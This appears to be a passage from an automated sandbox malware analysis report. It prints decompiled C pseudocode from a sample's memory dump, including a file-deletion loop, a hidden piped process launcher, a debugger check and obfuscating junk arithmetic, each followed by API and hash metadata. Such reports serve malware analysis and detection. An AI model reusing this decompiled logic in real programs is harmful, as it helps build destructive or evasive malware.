					_t75 = FindFirstFileA( &_v300,  &_v620);
					if(_t75 != 0xffffffff) {
						_t118 =  *0xfae1fc; // 0x80000000
						_v16 = _t118;
						asm("fild dword [ebp-0xc]");
						asm("fsubp st1, st0");
						do {
							 *0xfae060 = ( *0xfae060 & 0x0000ffff) - 0x76cf129e;
							_t64 =  &(_v620.cFileName);
							 *_v8 = 0;
							_t101 = _t64;
							do {
								_t119 =  *_t64;
								_t64 = _t64 + 1;
							} while (_t119 != 0);
							_t65 = _t64 - _t101;
							_t148 = _t101;
							_t137 =  &_v300 - 1;
							do {
								_t102 =  *(_t137 + 1);
								_t137 = _t137 + 1;
							} while (_t102 != 0);
							_t104 = _t65 >> 2;
							_t66 = memcpy(_t137, _t148, _t104 << 2);
							_v20 =  *0xfae110 -  *0xfa7918;
							memcpy(_t148 + _t104 + _t104, _t148, _t66 & 0x00000003);
							_t157 = _t157 + 0x18;
							 *0xfae3f0 =  *0xfae3f0 * _v20;
							_t196 =  *0xfae110 +  *0xfa75c8;
							 *0xfae110 = _t196;
							DeleteFileA( &_v300);
							_t69 =  *0xfae2c4; // 0x331a
							_v16 = _t69;
							asm("fild dword [ebp-0xc]");
							_v16 = _t196;
							asm("fsubr dword [ebp-0xc]");
							 *0xfae2c4 = E00F7CABC();
							_t187 =  *0xfae0b0;
							asm("fld1");
							asm("faddp st1, st0");
							 *0xfae0b0 = _t187;
						} while (FindNextFileA(_t75,  &_v620) != 0);
						FindClose(_t75);
					}
					_t61 =  *0xfae4b8; // 0x5ad8
					_v8 = _t61;
					asm("fild dword [ebp-0x4]");
					_v12 = _t187;
					_t117 =  *0xfae3e8; // 0xa0a95d4a
					asm("fsubr qword [ebp-0x8]");
					_v8 = _t117;
					_v20 =  *0xfae3b0;
					asm("fild dword [ebp-0x4]");
					_t43 = E00F7CABC();
					 *0xfae3e8 = _t43;
					 *0xfae4b8 =  *0xfae4b8 - 1;
				}
				return _t43;
			}

0x00f6d849
0x00f6d84e
0x00f6d851
0x00f6d85a
0x00f6d863
0x00f6d86a
0x00f6d870
0x00f6d873
0x00f6d876
0x00f6d879
0x00f6d87c
0x00f6d888
0x00f6d88e
0x00f6d8a2
0x00f6d8a4
0x00f6d8ac
0x00f6d8be
0x00f6d8c9
0x00f6d8ce
0x00f6d8df
0x00f6d8e5
0x00f6d8eb
0x00f6d8ee
0x00f6d8f5
0x00f6d8f8
0x00f6d8f8
0x00f6d8fa
0x00f6d8fb
0x00f6d8ff
0x00f6d907
0x00f6d90d
0x00f6d910
0x00f6d913
0x00f6d91d
0x00f6d920
0x00f6d92c
0x00f6d938
0x00f6d93e
0x00f6d944
0x00f6d94a
0x00f6d951
0x00f6d954
0x00f6d957
0x00f6d95c
0x00f6d960
0x00f6d960
0x00f6d962
0x00f6d963
0x00f6d96f
0x00f6d971
0x00f6d973
0x00f6d974
0x00f6d974
0x00f6d977
0x00f6d978
0x00f6d97e
0x00f6d98f
0x00f6d996
0x00f6d998
0x00f6d99b
0x00f6d9a0
0x00f6d9a0
0x00f6d9a2
0x00f6d9a3
0x00f6d9af
0x00f6d9b1
0x00f6d9b3
0x00f6d9b4
0x00f6d9b4
0x00f6d9b7
0x00f6d9b8
0x00f6d9be
0x00f6d9c1
0x00f6d9cb
0x00f6d9cd
0x00f6d9d2
0x00f6d9e9
0x00f6d9ee
0x00f6d9fa
0x00f6da00
0x00f6da03
0x00f6da06
0x00f6da10
0x00f6da1f
0x00f6da25
0x00f6da2b
0x00f6da2e
0x00f6da30
0x00f6da30
0x00f6da32
0x00f6da33
0x00f6da3d
0x00f6da3f
0x00f6da41
0x00f6da42
0x00f6da42
0x00f6da45
0x00f6da46
0x00f6da58
0x00f6da5b
0x00f6da5d
0x00f6da6e
0x00f6da6e
0x00f6da70
0x00f6da7c
0x00f6da82
0x00f6da8f
0x00f6da95
0x00f6da9e
0x00f6daa1
0x00f6daa4
0x00f6daad
0x00f6dab5
0x00f6dabb
0x00f6dac1
0x00f6dac9
0x00f6dacd
0x00f6dad9
0x00f6dae2
0x00f6dae2
0x00f6dae8
0x00f6daf1
0x00f6daf4
0x00f6daf7
0x00f6db00
0x00f6db06
0x00f6db09
0x00f6db0c
0x00f6db0f
0x00f6db15
0x00f6db1b
0x00f6db20
0x00f6db27
0x00f6db2c

APIs

Sleep.KERNEL32(000003E8,?,00000000), ref: 00F6D944
FindFirstFileA.KERNEL32(?,?,?,?,00000000,74CB4EE0,?,00000000), ref: 00F6D9E3
DeleteFileA.KERNEL32(?,?,?,00000000,74CB4EE0,?,00000000), ref: 00F6DA8F
FindNextFileA.KERNEL32(00000000,?,?,?,00000000,74CB4EE0,?,00000000), ref: 00F6DAD3
FindClose.KERNEL32(00000000,?,?,00000000,74CB4EE0,?,00000000), ref: 00F6DAE2

Strings

7i\, xrefs: 00F6D888

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: FileFind$CloseDeleteFirstNextSleep
String ID: 7i\
API String ID: 1528862845-1329047267
Opcode ID: 00841cb49b6a937b025d96cffa39550aaacdd2ceca358cea50dd118e6303bbef
Instruction ID: b1c3046844b44af4ea4d5365d8fee962235aa45e270cb503019f7c941d4380ed
Opcode Fuzzy Hash: 00841cb49b6a937b025d96cffa39550aaacdd2ceca358cea50dd118e6303bbef
Instruction Fuzzy Hash: D581A3B5D0061DDBDB049F64ECA82EEBFB5FB8A310F118599D885A3264DB710A64EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00F7EC30 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00F7EC30(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xfae7f0; // 0x251384df
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xfb1428 = _t6;
				 *0xfb1424 = _t22;
				 *0xfb1420 = _t25;
				 *0xfb141c = _t21;
				 *0xfb1418 = _t27;
				 *0xfb1414 = _t26;
				 *0xfb1440 = ss;
				 *0xfb1434 = cs;
				 *0xfb1410 = ds;
				 *0xfb140c = es;
				 *0xfb1408 = fs;
				 *0xfb1404 = gs;
				asm("pushfd");
				_pop( *0xfb1438);
				 *0xfb142c =  *_t31;
				 *0xfb1430 = _v0;
				 *0xfb143c =  &_a4;
				 *0xfb1378 = 0x10001;
				_t11 =  *0xfb1430; // 0x0
				 *0xfb132c = _t11;
				 *0xfb1320 = 0xc0000409;
				 *0xfb1324 = 1;
				_t12 =  *0xfae7f0; // 0x251384df
				_v812 = _t12;
				_t13 =  *0xfae7f4; // 0xdaec7b20
				_v808 = _t13;
				 *0xfb1370 = IsDebuggerPresent();
				_push(1);
				E00F7EC28(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xfa9dec);
				if( *0xfb1370 == 0) {
					_push(1);
					E00F7EC28(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00f7ec30
0x00f7ec30
0x00f7ec30
0x00f7ec30
0x00f7ec30
0x00f7ec30
0x00f7ec30
0x00f7ec36
0x00f7ec38
0x00f7ec38
0x00f8fe84
0x00f8fe89
0x00f8fe8f
0x00f8fe95
0x00f8fe9b
0x00f8fea1
0x00f8fea7
0x00f8feae
0x00f8feb5
0x00f8febc
0x00f8fec3
0x00f8feca
0x00f8fed1
0x00f8fed2
0x00f8fedb
0x00f8fee3
0x00f8feeb
0x00f8fef6
0x00f8ff00
0x00f8ff05
0x00f8ff0a
0x00f8ff14
0x00f8ff1e
0x00f8ff23
0x00f8ff29
0x00f8ff2e
0x00f8ff3a
0x00f8ff3f
0x00f8ff41
0x00f8ff49
0x00f8ff54
0x00f8ff61
0x00f8ff63
0x00f8ff65
0x00f8ff6a
0x00f8ff7e

APIs

IsDebuggerPresent.KERNEL32 ref: 00F8FF34
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F8FF49
UnhandledExceptionFilter.KERNEL32(00FA9DEC), ref: 00F8FF54
GetCurrentProcess.KERNEL32(C0000409), ref: 00F8FF70
TerminateProcess.KERNEL32(00000000), ref: 00F8FF77

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8c30f0b0bf15e7deccf1bcdd206c7a6b59164a4c779d68a5713b6e4903431640
Instruction ID: b8d0ce6dfec9d3daf4fa3ab0c5e2d0cd9a610865edc9f4c1d51666459a4f2d55
Opcode Fuzzy Hash: 8c30f0b0bf15e7deccf1bcdd206c7a6b59164a4c779d68a5713b6e4903431640
Instruction Fuzzy Hash: 8321C0B881020CDFD700EF65F9A86847BE8FB0A345F94866AE40887361E7B05985EF95

Uniqueness

Uniqueness Score: -1.00%

Function 00F8EA72 Relevance: 54.3, APIs: 36, Instructions: 344
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00F8EA72(void* __edx, void* __edi, void* __esi, signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				char _v60;
				intOrPtr* _t131;
				intOrPtr* _t132;
				unsigned int _t135;
				signed char _t137;
				signed int _t141;
				void* _t145;
				signed int _t154;
				unsigned int _t156;
				signed char _t158;
				signed int* _t163;
				intOrPtr* _t183;
				unsigned int _t185;
				void* _t189;
				void* _t191;
				char* _t207;
				signed int _t213;
				intOrPtr* _t214;
				signed int _t215;
				signed int _t219;
				void* _t222;
				signed int* _t224;
				void* _t227;
				signed int* _t238;
				signed char _t243;
				void* _t285;
				void* _t286;
				signed int _t288;
				void* _t290;
				signed int* _t291;
				signed int _t292;

				_t290 = __esi;
				_t286 = __edi;
				_t285 = __edx;
				_t131 =  *0xfb12d0; // 0x0
				_t247 =  *_t131;
				if(_t247 != 0) {
					__eflags = _t247 - 0x36;
					if(_t247 < 0x36) {
						L4:
						__eflags = _t247 - 0x5f;
						if(_t247 == 0x5f) {
							goto L6;
						} else {
							_t238 = _a4;
							_t238[1] = _t238[1] & 0xffff00ff;
							 *_t238 =  *_t238 & 0x00000000;
							__eflags =  *_t238;
							_t238[1] = 2;
							return _t238;
						}
					} else {
						__eflags = _t247 - 0x39;
						if(_t247 <= 0x39) {
							L6:
							_t243 = _t247 - 0x36;
							_t132 = _t131 + 1;
							 *0xfb12d0 = _t132;
							__eflags = _t243 - 0x29;
							if(_t243 != 0x29) {
								__eflags = _t243;
								if(_t243 < 0) {
									goto L14;
								} else {
									__eflags = _t243 - 3;
									goto L13;
								}
								goto L15;
							} else {
								_t247 =  *_t132;
								__eflags = _t247;
								if(_t247 == 0) {
									E00F8BB9C(_t247, _a4, 1, _a8);
									_t163 = _a4;
								} else {
									_t243 = _t247 - 0x3d;
									 *0xfb12d0 = _t132 + 1;
									__eflags = _t243 - 4;
									if(_t243 < 4) {
										L14:
										_t243 = _t243 | 0xffffffff;
										__eflags = _t243;
									} else {
										__eflags = _t243 - 7;
										L13:
										if(__eflags > 0) {
											goto L14;
										}
									}
									L15:
									__eflags = _t243 - 0xffffffff;
									if(_t243 != 0xffffffff) {
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 & 0xffff0000;
										_push(_t290);
										_t291 = _a8;
										_push(_t286);
										_v12 =  *_t291;
										_t288 = _t243 & 0x00000002;
										__eflags = _t288;
										_v8 = _t291[1];
										if(_t288 == 0) {
											L25:
											__eflags = _t243 & 0x00000004;
											if((_t243 & 0x00000004) != 0) {
												_t185 =  *0xfb12e0; // 0x0
												__eflags =  !(_t185 >> 1) & 0x00000001;
												_push( &_v60);
												if(__eflags == 0) {
													_t189 = E00F8D7F7(_t285, __eflags);
													_t247 =  &_v12;
													E00F8ACC9( &_v12, _t189);
												} else {
													_t191 = E00F8D7F7(_t285, __eflags);
													E00F8B920(E00F8B4AB( &_v52, 0x20),  &_v36, _t191);
													_v28 = _v36;
													_v24 = _v32;
													_t247 =  &_v28;
													E00F8B701( &_v28,  &_v12);
													_v12 = _v28;
													_v8 = _v24;
												}
											}
											_t135 =  *0xfb12e0; // 0x0
											_t137 =  !(_t135 >> 1);
											__eflags = _t137 & 0x00000001;
											if((_t137 & 0x00000001) == 0) {
												E00F8ACC9( &_v12, E00F8B80D(_t247,  &_v60));
											} else {
												_t183 = E00F8B920(E00F8B80D(_t247,  &_v52),  &_v60,  &_v12);
												_v12 =  *_t183;
												_v8 =  *((intOrPtr*)(_t183 + 4));
											}
											__eflags =  *_t291;
											if( *_t291 != 0) {
												E00F8B920(E00F8B4AB( &_v60, 0x28),  &_v36,  &_v12);
												_v28 = _v36;
												_v24 = _v32;
												E00F8B968( &_v28, 0x29);
												_v12 = _v28;
												_v8 = _v24;
											}
											_t141 = E00F8AB31(0xfb12b0, 8, 0);
											__eflags = _t141;
											if(_t141 == 0) {
												_t292 = 0;
												__eflags = 0;
											} else {
												 *(_t141 + 4) = 0;
												 *(_t141 + 4) =  *(_t141 + 4) & 0xffff00ff;
												 *_t141 = 0;
												_t292 = _t141;
											}
											E00F8B3A2(_t285, _t288,  &_v44, _t292);
											_t145 = E00F8BE5E(0xfb12b0, _t285,  &_v60);
											E00F8B920(E00F8B4AB( &_v52, 0x28),  &_v36, _t145);
											_v28 = _v36;
											_v24 = _v32;
											E00F8B968( &_v28, 0x29);
											E00F8B701( &_v12,  &_v28);
											_t154 =  *0xfb12e0; // 0x0
											__eflags = (_t154 & 0x00000060) - 0x60;
											if((_t154 & 0x00000060) != 0x60) {
												__eflags = _t288;
												if(_t288 != 0) {
													E00F8B701( &_v12,  &_v20);
												}
											}
											_t156 =  *0xfb12e0; // 0x0
											_t158 =  !(_t156 >> 8);
											__eflags = _t158 & 0x00000001;
											_push( &_v60);
											if((_t158 & 0x00000001) == 0) {
												E00F8ACC9( &_v12, E00F8BF3E());
											} else {
												E00F8B701( &_v12, E00F8BF3E());
											}
											__eflags = _t292;
											if(_t292 == 0) {
												E00F8B0E6(_a4, 3);
												goto L49;
											} else {
												 *_t292 = _v12;
												 *((intOrPtr*)(_t292 + 4)) = _v8;
												_t163 = _a4;
												 *_t163 = _v44;
												_t163[1] = _v40;
											}
										} else {
											E00F8B920(E00F8B4D8( &_v36, "::"),  &_v28,  &_v12);
											_v12 = _v28;
											_v8 = _v24;
											_t207 =  *0xfb12d0; // 0x0
											__eflags =  *_t207;
											if( *_t207 == 0) {
												E00F8B920(E00F8B0E6( &_v60, 1),  &_v36,  &_v12);
												_v12 = _v36;
												_t213 = _v32;
											} else {
												_push( &_v52);
												_t227 = E00F8E7BB(_t285);
												E00F8B920(E00F8B4AB( &_v60, 0x20),  &_v36, _t227);
												_v28 = _v36;
												_v24 = _v32;
												E00F8B701( &_v28,  &_v12);
												_v12 = _v28;
												_t213 = _v24;
											}
											_v8 = _t213;
											_t214 =  *0xfb12d0; // 0x0
											_t215 =  *_t214;
											__eflags = _t215;
											if(_t215 == 0) {
												E00F8B920(E00F8B0E6( &_v60, 1), _a4,  &_v12);
												L49:
												_t163 = _a4;
											} else {
												__eflags = _t215 - 0x40;
												if(_t215 != 0x40) {
													_t163 = _a4;
													_t163[1] = _t163[1] & 0xffff00ff;
													 *_t163 =  *_t163 & 0x00000000;
													_t163[1] = 2;
												} else {
													_t219 =  *0xfb12e0; // 0x0
													 *0xfb12d0 =  *0xfb12d0 + 1;
													__eflags = (_t219 & 0x00000060) - 0x60;
													_push( &_v60);
													if((_t219 & 0x00000060) == 0x60) {
														_t222 = E00F8B00B();
														_t247 =  &_v20;
														E00F8ACC9( &_v20, _t222);
													} else {
														_t224 = E00F8B00B();
														_t247 =  *_t224;
														_v20 =  *_t224;
														_v16 = _t224[1];
													}
													goto L25;
												}
											}
										}
									} else {
										_t163 = _a4;
										_t163[1] = _t163[1] & 0xffff00ff;
										 *_t163 =  *_t163 & 0x00000000;
										_t163[1] = 2;
									}
								}
							}
							return _t163;
						} else {
							goto L4;
						}
					}
				} else {
					E00F8BB9C(_t247, _a4, 1, _a8);
					return _a4;
				}
			}

0x00f8ea72
0x00f8ea72
0x00f8ea72
0x00f8ea77
0x00f8ea7c
0x00f8ea83
0x00f8ea9a
0x00f8ea9d
0x00f8eaa4
0x00f8eaa4
0x00f8eaa7
0x00000000
0x00f8eaa9
0x00f8eaa9
0x00f8eaac
0x00f8eab3
0x00f8eab3
0x00f8eab6
0x00f8eabb
0x00f8eabb
0x00f8ea9f
0x00f8ea9f
0x00f8eaa2
0x00f8eabc
0x00f8eac0
0x00f8eac3
0x00f8eac4
0x00f8eac9
0x00f8eacc
0x00f8eb02
0x00f8eb04
0x00000000
0x00f8eb06
0x00f8eb06
0x00000000
0x00f8eb06
0x00000000
0x00f8eace
0x00f8eace
0x00f8ead0
0x00f8ead2
0x00f8eaf2
0x00f8eaf7
0x00f8ead4
0x00f8ead7
0x00f8eadb
0x00f8eae0
0x00f8eae3
0x00f8eb0b
0x00f8eb0b
0x00f8eb0b
0x00f8eae5
0x00f8eae5
0x00f8eb09
0x00f8eb09
0x00000000
0x00000000
0x00f8eb09
0x00f8eb0e
0x00f8eb0e
0x00f8eb11
0x00f8eb29
0x00f8eb2d
0x00f8eb34
0x00f8eb35
0x00f8eb3a
0x00f8eb3b
0x00f8eb43
0x00f8eb43
0x00f8eb46
0x00f8eb49
0x00f8ec27
0x00f8ec27
0x00f8ec2a
0x00f8ec30
0x00f8ec39
0x00f8ec3e
0x00f8ec3f
0x00f8eccb
0x00f8ecd2
0x00f8ecd5
0x00f8ec45
0x00f8ec45
0x00f8ec5c
0x00f8ec64
0x00f8ec6a
0x00f8ec71
0x00f8ec74
0x00f8ec7c
0x00f8ec82
0x00f8ec82
0x00f8ec3f
0x00f8ecda
0x00f8ece1
0x00f8ece3
0x00f8ece5
0x00f8ed1b
0x00f8ece7
0x00f8ecfb
0x00f8ed05
0x00f8ed08
0x00f8ed08
0x00f8ed22
0x00f8ed24
0x00f8ed3a
0x00f8ed42
0x00f8ed4d
0x00f8ed50
0x00f8ed58
0x00f8ed5e
0x00f8ed5e
0x00f8ed69
0x00f8ed6e
0x00f8ed70
0x00f8ed82
0x00f8ed82
0x00f8ed72
0x00f8ed72
0x00f8ed75
0x00f8ed7c
0x00f8ed7e
0x00f8ed7e
0x00f8ed89
0x00f8ed92
0x00f8edab
0x00f8edb3
0x00f8edbe
0x00f8edc1
0x00f8edcd
0x00f8edd2
0x00f8edda
0x00f8eddc
0x00f8edde
0x00f8ede0
0x00f8ede9
0x00f8ede9
0x00f8ede0
0x00f8edee
0x00f8edf6
0x00f8edf8
0x00f8edfd
0x00f8edfe
0x00f8ee1b
0x00f8ee00
0x00f8ee0a
0x00f8ee0a
0x00f8ee20
0x00f8ee22
0x00f8ee44
0x00000000
0x00f8ee24
0x00f8ee27
0x00f8ee2c
0x00f8ee32
0x00f8ee35
0x00f8ee3a
0x00f8ee3a
0x00f8eb4f
0x00f8eb66
0x00f8eb6e
0x00f8eb74
0x00f8eb77
0x00f8eb7c
0x00f8eb7f
0x00f8ebd8
0x00f8ebe0
0x00f8ebe3
0x00f8eb81
0x00f8eb84
0x00f8eb85
0x00f8eb9c
0x00f8eba4
0x00f8ebaa
0x00f8ebb4
0x00f8ebbc
0x00f8ebbf
0x00f8ebbf
0x00f8ebe6
0x00f8ebe9
0x00f8ebee
0x00f8ebf0
0x00f8ebf2
0x00f8ecc1
0x00f8ee49
0x00f8ee49
0x00f8ebf8
0x00f8ebf8
0x00f8ebfa
0x00f8ec98
0x00f8ec9b
0x00f8eca2
0x00f8eca5
0x00f8ec00
0x00f8ec00
0x00f8ec05
0x00f8ec0e
0x00f8ec13
0x00f8ec14
0x00f8ec87
0x00f8ec8e
0x00f8ec91
0x00f8ec16
0x00f8ec16
0x00f8ec1c
0x00f8ec21
0x00f8ec24
0x00f8ec24
0x00000000
0x00f8ec14
0x00f8ebfa
0x00f8ebf2
0x00f8eb13
0x00f8eb13
0x00f8eb16
0x00f8eb1d
0x00f8eb20
0x00f8eb20
0x00f8eb11
0x00f8ead2
0x00f8ee50
0x00000000
0x00000000
0x00000000
0x00f8eaa2
0x00f8ea85
0x00f8ea8d
0x00f8ea99
0x00f8ea99

APIs

operator+.LIBCMT ref: 00F8EA8D

Part of subcall function 00F8BB9C: DName::DName.LIBCMT ref: 00F8BBAF
Part of subcall function 00F8BB9C: DName::operator+.LIBCMT ref: 00F8BBB6

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 9eaf46a47b465f12dbe86b21817d455afd20fcb67379db429ba46246f38281cd
Instruction ID: e4ec7f286100b47f11f6504dc1f2d948af101069889ab2bba44ea46d1bcb3b77
Opcode Fuzzy Hash: 9eaf46a47b465f12dbe86b21817d455afd20fcb67379db429ba46246f38281cd
Instruction Fuzzy Hash: 46D11C76D00209AFDF14EFA4D896AEEBBB8FF04310F14405AF511E7291DB34AA45EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F61000 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 244
pipeprocessfileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00F61000(CHAR* _a4, CHAR* _a8, void* _a12, long _a16, intOrPtr _a20) {
				signed char _v8;
				void* _v12;
				signed int _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				struct _SECURITY_ATTRIBUTES _v44;
				struct _PROCESS_INFORMATION _v60;
				long long _v68;
				long _v72;
				struct _STARTUPINFOA _v140;
				signed char _t70;
				void* _t88;
				short _t93;
				int _t101;
				int _t115;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t126;
				intOrPtr _t130;
				intOrPtr _t132;
				intOrPtr _t137;
				intOrPtr _t141;
				short _t147;
				int _t150;
				signed int _t172;
				signed long long _t179;

				_v20 =  *0xfae054 -  *0xfa7f80;
				_t70 =  *0xfae44c; // 0x2575
				 *0xfae44c =  *0xfae44c + 1;
				_v8 = _t70;
				_v68 =  *0xfae084 +  *0xfa7f7c;
				asm("fild dword [ebp-0x4]");
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				if((_t70 & 0x00000041) == 0) {
					 *0xfae5a0 =  *0xfae5a0 *  *0xfa7f78;
				}
				_t172 =  *0xfae328 +  *0xfa7f70;
				_v44.lpSecurityDescriptor = 0;
				_v44.nLength = 0;
				asm("fcomp qword [0xfa7f68]");
				_v44.bInheritHandle = 0;
				_v44.lpSecurityDescriptor = 0;
				_t150 = 0;
				asm("fnstsw ax");
				_t115 = 0;
				_v44.nLength = 0xc;
				_v44.bInheritHandle = 1;
				if(0 == 0) {
					 *0xfae180 =  *0xfae180 - 1;
					_t147 =  *0xfae598; // 0x0
					_v8 = _t147;
					asm("fild dword [ebp-0x4]");
					_v68 = _t172;
					_t132 =  *0xfae180; // 0x7247
					_v20 =  *0xfae3b8;
					_v8 = _t132;
					asm("fild dword [ebp-0x4]");
					asm("fsubr qword [ebp-0x40]");
					 *0xfae598 = E00F7CABC();
					_t172 =  *0xfae3b8;
					asm("fld1");
					asm("fsubp st1, st0");
					 *0xfae3b8 = _t172;
				}
				if(CreatePipe( &_v28,  &_v24,  &_v44, 0) == 0) {
					L17:
					E00F6CB90(_a20, _t165);
				} else {
					SetHandleInformation(_v28, 1, 0);
					if(CreatePipe( &_v32,  &_v12,  &_v44, 0) != 0) {
						_t122 =  *0xfae4f4; // 0x1c86
						_v8 = _t122;
						asm("fild dword [ebp-0x4]");
						_v20 = _t172;
						_t179 =  *0xfae5c0 * _v20;
						 *0xfae5c0 = _t179;
						SetHandleInformation(_v12, 1, 0);
						_t123 =  *0xfae40c; // 0x42a5c332
						_v8 = _t123;
						asm("fild dword [ebp-0x4]");
						_v20 = _t179;
						_t137 =  *0xfae00c; // 0x640f69d6
						_v8 = _t137;
						asm("fild dword [ebp-0x4]");
						asm("fsubp st1, st0");
						asm("fsubr qword [ebp-0x10]");
						 *0xfae40c = E00F7CABC();
						 *0xfae00c =  *0xfae00c - 1;
						_v60.hProcess = 0;
						_v60.hThread = 0;
						_v60.dwProcessId = 0;
						_v60.dwThreadId = 0;
						E00F7C990( &_v140, 0, 0x44);
						_t88 = _v24;
						_v140.dwFlags = _v140.dwFlags | 0x00000101;
						_v140.hStdError = _t88;
						_v140.hStdOutput = _t88;
						_v140.hStdInput = _v32;
						_v140.wShowWindow = 0;
						_v140.cb = 0x44;
						if(CreateProcessA(0, _a4, 0, 0, 1, 0, 0, _a8,  &_v140,  &_v60) == 0) {
							L12:
							CloseHandle(_v12);
						} else {
							_t101 = WriteFile(_v12, _a12, _a16,  &_v72, 0);
							_t161 = _t101;
							if(_t101 == 0) {
								goto L12;
							} else {
								CloseHandle(_v12);
								CloseHandle(_v24);
								 *0xfae60c =  *0xfae60c -  *0xfa7f50;
								_t115 = 1;
								E00F6B9C0(_t161,  *0xfae60c -  *0xfa7f50, _v28, _a20);
								WaitForSingleObject(_v60.hProcess, 0x2710);
								_t130 =  *0xfae1f8; // 0x3d8
								if(_t130 + 0x40adce15 > 0xb96f9644) {
									 *0xfae4f0 = E00F7CABC();
								} else {
									 *0xfae328 = 0x69400000;
									 *0xfae32c = 0xc1da316e;
								}
								CloseHandle(_v60);
								CloseHandle(_v60.hThread);
								_t150 = _t115;
							}
						}
						_t93 =  *0xfae598; // 0x0
						_t126 =  *0xfae24c; // 0x97715537
						_t141 =  *0xfae5b4; // 0x1cd4719a
						 *0xfae598 = _t93 - _t126 - _t141 + 0x5442358a;
						 *0xfae5b4 =  *0xfae5b4 + 1;
						 *0xfae24c =  *0xfae24c - 1;
						CloseHandle(_v32);
					}
					CloseHandle(_v28);
					if(_t115 == 0) {
						CloseHandle(_v24);
					}
					_v20 =  *0xfae60c +  *0xfa7f4c;
					 *0xfae184 =  *0xfae184 + _v20;
					asm("fld1");
					asm("fsubp st1, st0");
					_t165 = _t150;
					if(_t150 == 0) {
						goto L17;
					}
				}
				return _t150;
			}

0x00f61015
0x00f6101e
0x00f6102a
0x00f61034
0x00f61037
0x00f6103a
0x00f61040
0x00f61043
0x00f61048
0x00f61056
0x00f61056
0x00f61064
0x00f6106a
0x00f6106e
0x00f61071
0x00f61077
0x00f6107a
0x00f6107e
0x00f61080
0x00f61082
0x00f61084
0x00f6108b
0x00f61095
0x00f61097
0x00f6109e
0x00f610a8
0x00f610ab
0x00f610ae
0x00f610b7
0x00f610c1
0x00f610c4
0x00f610c7
0x00f610d3
0x00f610db
0x00f610e1
0x00f610e7
0x00f610e9
0x00f610eb
0x00f610eb
0x00f61107
0x00f61362
0x00f61365
0x00f6110d
0x00f61115
0x00f61131
0x00f61137
0x00f61141
0x00f61148
0x00f6114b
0x00f61157
0x00f6115b
0x00f61161
0x00f61167
0x00f6116d
0x00f61170
0x00f61173
0x00f6117c
0x00f61182
0x00f61185
0x00f61188
0x00f61190
0x00f61198
0x00f6119d
0x00f611a8
0x00f611ab
0x00f611ae
0x00f611b1
0x00f611bb
0x00f611c0
0x00f611c6
0x00f611d0
0x00f611d3
0x00f611df
0x00f611e9
0x00f611fe
0x00f61210
0x00f612d6
0x00f612da
0x00f61216
0x00f61228
0x00f6122e
0x00f61230
0x00000000
0x00f61236
0x00f6123a
0x00f61244
